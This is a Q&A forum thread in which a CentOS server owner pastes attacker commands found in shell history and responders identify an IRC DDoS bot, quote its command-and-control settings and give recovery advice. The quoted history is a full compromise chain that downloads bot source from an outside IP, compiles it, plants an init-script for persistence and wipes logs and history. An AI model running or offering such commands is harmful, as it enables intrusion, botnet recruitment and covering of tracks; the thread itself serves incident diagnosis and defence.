10

We logged remotely into our CentOS server today using Putty, and while wandering through previous commands using the up arrow, stumbled across the following:

unset HISTFILE
mkdir /usr/lib/tmp 
cd /usr/lib/tmp 
wget http://188.72.217.17/mzb.c -o /dev/null
wget http://188.72.217.17/windef.h -o /dev/null
gcc mzb.c -o /bin/bot -lpthread
rm -rf mzb.c
rm -rf windef.h
wget http://188.72.217.17/botsupport.sh -o /dev/null
chmod +x botsupport.sh
mv botsupport.sh /etc/init.d/httpd2
cat /etc/init.d/network > /etc/init.d/network.bp
echo \#\!/bin/sh  >  /etc/init.d/network
echo nohup /etc/init.d/httpd2 \& >> /etc/init.d/network
cat /etc/init.d/network.bp >> /etc/init.d/network
cat /dev/null > /var/log/lastlog
history -c
nohup /etc/init.d/httpd2 &

(&&'s replaced with newlines for clarity)

I never ran these commands, EVER! How did this happen, is my server being hacked? I immediately changed my root password, but was hoping someone could make heads or tails of what's happening over here.

I see references made in the source to ddos bots, and me and my colleague are seriously concerned!

Thanks in advance!

Josef van Niekerk
  • 501
  • 4
  • 8
  • 15
  • Belongs on ServerFault.com – Oded Feb 10 '10 at 20:02
  • 1
    Let me be the first to say: This is why you shouldn't be running as root... – Aistina Feb 10 '10 at 20:05
  • 1
    I hope you celebrated Backup Awareness Day. I celebrated Restore Awareness Day this week and found my automated deployment to be lacking. May your recovery be easier than mine was. – Mnebuerquo Feb 10 '10 at 20:48
  • Here is a few related questions you should look at. http://serverfault.com/questions/6159/aftermath-of-hack http://serverfault.com/questions/6190/reinstall-after-a-root-compromise http://serverfault.com/questions/57962/whats-wrong-with-always-being-root – Zoredache Feb 10 '10 at 21:13
  • 1
    Nice of the hacker to backup your `/etc/init.d/network` file. – ceejayoz Feb 11 '10 at 00:00

6 Answers6

7

yes, you have been hacked. The hacker installed an IRC backdoor and you are connecting to this IRC server:

const  int port      = 1254; 
const char channel[] = "#test";
const char password[]= "pass";
const char server[]  = "heathen.cc";

The bot herder can execute any commands on your server. I recommend shutting down the server and reinstalling immediately. The bot has a few DDoS attack features, DNS flood, syn flood and ICMP flood. It also works on windows which is pretty cool. There is a really old spreading module to infect myDoom. This looks like some old malware.

Rook
  • 2,615
  • 5
  • 26
  • 34
  • 3
    This is why you should always have firewall rules that block egress traffic. A properly configured firewall would have blocked this attack from being able to talk to it's command and control irc server. – 3dinfluence Feb 10 '10 at 20:39
  • This wouldn't have prevented the initial intrusion but would have made it more difficult for the attacker to add your server to a botnet. Either way you would have been faced with re-imaging your OS. – 3dinfluence Feb 10 '10 at 20:44
  • 3
    "This looks like some old malware." - good thing he was running antivirus on his Linux box to detect this. – ta.speot.is Feb 10 '10 at 22:03
  • @taspeotis +1 for the efficient use of humorous sarcasm... – Joe Internet Feb 11 '10 at 00:39
  • I'm curious, how did you know that (the enemy server, port, UN, PW) from those commands? – John Dec 08 '10 at 05:34
  • @John I dug it out of the mzb.c file that its downloading and then compiling. – Rook Dec 08 '10 at 17:29
  • @Rook:And you got access to this file by.......visiting the IP in the question and downloading it yourself? – John Dec 09 '10 at 07:16
  • @John Well yeah the link is right there. It looks like the server down, which is good. – Rook Dec 09 '10 at 07:24
  • @Rook:OK. Thanks for taking the time to answer me. I'm new at this so I'm trying to learn where I can. – John Dec 09 '10 at 07:34
6

The answer is in any case yes, your server is being or has been compromised.

You should cut off the Internet connection to the server immediately, make a full backup (bear in mind other files may be compromised, too), and reinstall.

Also, you may want to notify the owners of the IP the bot net (or whatever this is) is run from. Here is the RIPE whois data.

Pekka
  • 2,158
  • 3
  • 19
  • 32
1

Never allow root login via SSH.

Peter D
  • 111
  • 3
0

The answer to your question is: YES

cherouvim
  • 744
  • 3
  • 18
  • 37
0

Sounds like you've been infected with BOT_VERSION where BOT_VERSION is

#define BOT_VERSION "Linux/Unix IRC DDoS bot ver "BIN_VERSVION" by ["CRED"MZђ"CEND"]. Supported features : "FEATURES

Didn't your Linux antivirus pick this up?

ta.speot.is
  • 842
  • 5
  • 9
0

I probably would have sanitized the ip address of the C&C machine before posting.

jbroome
  • 121
  • 1